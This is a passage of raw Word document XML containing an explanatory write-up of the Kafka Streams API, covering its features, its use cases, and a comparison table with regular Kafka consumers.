          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> is a high-level, stateful stream processing library designed for real-time, event-driven applications that need powerful processing capabilities such as filtering, aggregations, and joins, directly within Kafka's ecosystem.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FDEFD7E" w14:textId="77777777" w:rsidR="00B63B45" w:rsidRPr="0003272F" w:rsidRDefault="00B63B45" w:rsidP="0003272F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="142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gular Kafka Consumers</w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>, on the other hand, are low-level consumers designed to consume and process data from Kafka topics, with less abstraction and without the built-in stream processing features, state management, or exactly-once semantics provided by Kafka Streams.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F752E52" w14:textId="6CFFDD8C"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7E73429">
          <v:rect id="_x0000_i3175" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D7EEF22" w14:textId="25C53CF3" w:rsidR="007C61B8" w:rsidRPr="00CE4B95" w:rsidRDefault="00FB1CF5" w:rsidP="00DB22BB">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="793" w:name="_Toc196308273"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>Explain the Kafka Streams API, its use cases for stream processing, and how it differs from regular Kafka consumers in terms of functionality</w:t>
      </w:r>
      <w:r w:rsidR="007C61B8" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="793"/>
    </w:p>
    <w:p w14:paraId="45774EC2" w14:textId="5471EC4A" w:rsidR="00C34B0B" w:rsidRPr="0003272F" w:rsidRDefault="00C34B0B" w:rsidP="0003272F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:num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 Streams API Overview</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D154039"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afka Streams</w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> is a Java library developed by Apache Kafka that simplifies stream processing applications. It enables developers to process data in real-time directly from Kafka topics with minimal setup, without requiring a separate processing engine like Apache Spark or Apache Flink. Kafka Streams provides high-level abstractions to handle both stateless and stateful transformations, windowing, and aggregations on streams of data.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="034D72B9" w14:textId="77777777" w:rsidR="00C34B0B" w:rsidRPr="0003272F" w:rsidRDefault="00C34B0B"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ey Features of Kafka Streams API:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D36D688" w14:textId="77777777" w:rsidR="00C34B0B" w:rsidRPr="0003272F" w:rsidRDefault="00C34B0B" w:rsidP="0003272F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="142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tream Processing</w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Kafka Streams supports a range of transformations such as filtering, mapping, and aggregation to process streams of data in real-time.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BD10982" w14:textId="77777777" w:rsidR="00C34B0B" w:rsidRPr="0003272F" w:rsidRDefault="00C34B0B" w:rsidP="0003272F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="142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tateful and Stateless Processing</w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">: It allows both </w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>stateful</w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> operations (e.g., joins, aggregations) and </w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>stateless</w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> operations (e.g., filtering, mapping).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D669280" w14:textId="77777777" w:rsidR="00C34B0B" w:rsidRPr="0003272F" w:rsidRDefault="00C34B0B" w:rsidP="0003272F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="142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Exactly-Once Semantics</w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Kafka Streams supports exactly-once processing semantics (EOS), which ensures that each record is processed exactly once and no data loss occurs.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="530EFCE9" w14:textId="77777777" w:rsidR="00C34B0B" w:rsidRPr="0003272F" w:rsidRDefault="00C34B0B" w:rsidP="0003272F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="142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lastRenderedPageBreak/>
        <w:t>Scalability</w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Kafka Streams leverages Kafka’s distributed architecture, which enables applications to scale horizontally by adding more instances of the application.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01094A45" w14:textId="77777777" w:rsidR="00C34B0B" w:rsidRPr="0003272F" w:rsidRDefault="00C34B0B" w:rsidP="0003272F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="142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Fault Tolerance</w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Kafka Streams automatically handles failures, leveraging Kafka's inherent durability and fault tolerance. It allows automatic recovery after a failure and guarantees message processing even after a crash.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C72E174" w14:textId="77777777" w:rsidR="00C34B0B" w:rsidRPr="0003272F" w:rsidRDefault="00C34B0B" w:rsidP="0003272F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="142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Windowing</w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Kafka Streams supports various types of windowing (e.g., tumbling, hopping), which allows developers to perform operations over fixed-size or sliding windows of time.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E3FF54F" w14:textId="77777777" w:rsidR="00C34B0B" w:rsidRPr="0003272F" w:rsidRDefault="00C34B0B" w:rsidP="0003272F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="142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ntegrated with Kafka</w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Kafka Streams is fully integrated with Kafka topics and brokers, allowing for easy data ingestion and production without needing an additional cluster.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36B2B8A8" w14:textId="77777777" w:rsidR="00C34B0B" w:rsidRPr="0003272F" w:rsidRDefault="00C34B0B"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 Streams Use Cases:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0162E086" w14:textId="77777777" w:rsidR="00C34B0B" w:rsidRPr="0003272F" w:rsidRDefault="00C34B0B" w:rsidP="0003272F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="142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al-time Analytics</w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Kafka Streams can process and analyze data in real-time, such as computing aggregates (e.g., running totals or averages) or performing windowed analysis on incoming events (e.g., analyzing user activity in a session).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="494C1FD7" w14:textId="77777777" w:rsidR="00C34B0B" w:rsidRPr="0003272F" w:rsidRDefault="00C34B0B" w:rsidP="0003272F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="142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ETL Pipelines</w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Kafka Streams can serve as an ETL (Extract, Transform, Load) engine, processing data from Kafka topics, transforming it (e.g., filtering, enriching), and loading it into another Kafka topic or an external system.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="086E4690" w14:textId="77777777" w:rsidR="00C34B0B" w:rsidRPr="0003272F" w:rsidRDefault="00C34B0B" w:rsidP="0003272F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="142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Event-driven Applications</w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Kafka Streams is perfect for building event-driven architectures where multiple services react to events (e.g., user actions, sensor data) and generate new events in response.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0995BDE2" w14:textId="77777777" w:rsidR="00C34B0B" w:rsidRPr="0003272F" w:rsidRDefault="00C34B0B" w:rsidP="0003272F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="142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al-time Data Enrichment</w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Kafka Streams can enrich real-time data streams by joining streams or performing aggregations to enhance incoming data with additional context or information from other sources.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50A24A16" w14:textId="77777777" w:rsidR="00C34B0B" w:rsidRPr="0003272F" w:rsidRDefault="00C34B0B" w:rsidP="0003272F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="142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ata Processing and Aggregation</w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: It is often used for real-time data aggregation, such as counting items or calculating the sum of values over a sliding time window.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D0116AA" w14:textId="77777777" w:rsidR="00C34B0B" w:rsidRPr="0003272F" w:rsidRDefault="00C34B0B"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How Kafka Streams Differs from Regular Kafka Consumers:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DCF6E72"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While </w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Kafka Streams</w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> is built for stream processing, </w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>regular Kafka consumers</w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> are typically used for simple message consumption and processing from Kafka topics. Here's how they differ in terms of functionali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5"/>
        <w:gridCol w:w="4663"/>
        <w:gridCol w:w="3586"/>
      </w:tblGrid>
      <w:tr w:rsidR="0003272F" w:rsidRPr="0003272F" w14:paraId="3FEE60AC" w14:textId="77777777" w:rsidTr="00C34B0B">
        <w:trPr>
          <w:tblHeader/>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="09CCDA78" w14:textId="77777777" w:rsidR="00C34B0B" w:rsidRPr="0003272F" w:rsidRDefault="00C34B0B"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Feature</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="12E5D2E9" w14:textId="77777777" w:rsidR="00C34B0B" w:rsidRPr="0003272F" w:rsidRDefault="00C34B0B"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 Streams</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="15D8F9A8" w14:textId="77777777" w:rsidR="00C34B0B" w:rsidRPr="0003272F" w:rsidRDefault="00C34B0B"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Regular Kafka Consumer</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0003272F" w:rsidRPr="0003272F" w14:paraId="332CC5D0" w14:textId="77777777" w:rsidTr="00C34B0B">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="36FF7AA1"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urpose</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="02104BA8"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Stream processing library for real-time transformations and aggregations.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="4633255A"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Used to consume messages from Kafka topics without stream processing features.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0003272F" w:rsidRPr="0003272F" w14:paraId="55DC294F" w14:textId="77777777" w:rsidTr="00C34B0B">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="57AD9E6B"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tate Management</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="3AA35141"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Supports both stateful (e.g., joins, aggregations) and stateless processing. Maintains state in local stores for stateful operations.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="2670F10C"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Regular consumers are stateless and do not manage internal state.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0003272F" w:rsidRPr="0003272F" w14:paraId="2EA77380" w14:textId="77777777" w:rsidTr="00C34B0B">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7A298E44"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rocessing</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="2743CD5A"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an perform complex operations like filtering, mapping, joining, aggregating, and windowing on streams.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="6F29B8E7"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imarily used for basic message consumption and processing.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0003272F" w:rsidRPr="0003272F" w14:paraId="6AF4C517" w14:textId="77777777" w:rsidTr="00C34B0B">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="6906B975"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Fault Tolerance</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="4205B40A"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Built-in fault tolerance and recovery. Kafka Streams applications automatically recover from failures, leveraging Kafka's partitioning and replication.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="6FD8CB1B"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Regular consumers rely on Kafka's offset management for fault tolerance but don't offer automatic recovery.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0003272F" w:rsidRPr="0003272F" w14:paraId="7C6034E2" w14:textId="77777777" w:rsidTr="00C34B0B">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="4B39EDFA"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arallelism and Scaling</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="086B7BF2"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Built-in support for horizontal scaling by processing data across multiple instances. Kafka Streams partitions the data and distributes the workload.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="1E7EAA83"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Requires manual scaling and partitioning to distribute workloads across multiple consumers.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0003272F" w:rsidRPr="0003272F" w14:paraId="24BDCF70" w14:textId="77777777" w:rsidTr="00C34B0B">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="11D9C561"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Exactly Once Semantics (EOS)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="6A75D6B4"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Streams supports </w:t>
            </w:r>
            <w:r w:rsidRPr="0003272F">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Exactly-Once Semantics (EOS)</w:t>
            </w:r>
            <w:r w:rsidRPr="0003272F">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve"> for processing, ensuring that each message is processed exactly once, even in the case of failures.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="45BAA7A2"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Regular consumers need to manually handle offset management to ensure messages are not lost or duplicated.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0003272F" w:rsidRPr="0003272F" w14:paraId="2E45E1A7" w14:textId="77777777" w:rsidTr="00C34B0B">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="20CBD082"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tate Stores</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="460AD661"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Streams provides state stores for stateful operations like aggregations and joins. State is stored locally, and the library ensures consistency across failures.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="28CF2832"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Regular consumers don’t maintain any local state; they rely on Kafka's offsets for tracking consumption.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0003272F" w:rsidRPr="0003272F" w14:paraId="2EF318A2" w14:textId="77777777" w:rsidTr="00C34B0B">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="49EE9531"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Ease of Development</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="60DE4440"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Streams abstracts much of the complexity around message consumption, offset </w:t>
            </w:r>
            <w:r w:rsidRPr="0003272F">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t>management, fault tolerance, and recovery, making it easier to build real-time applications.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="49ED4815"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lastRenderedPageBreak/>
              <w:t xml:space="preserve">Developers need to handle most aspects of message consumption, </w:t>
            </w:r>
            <w:r w:rsidRPr="0003272F">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t>fault tolerance, and offset management themselves.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0003272F" w:rsidRPr="0003272F" w14:paraId="14523C9C" w14:textId="77777777" w:rsidTr="00C34B0B">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
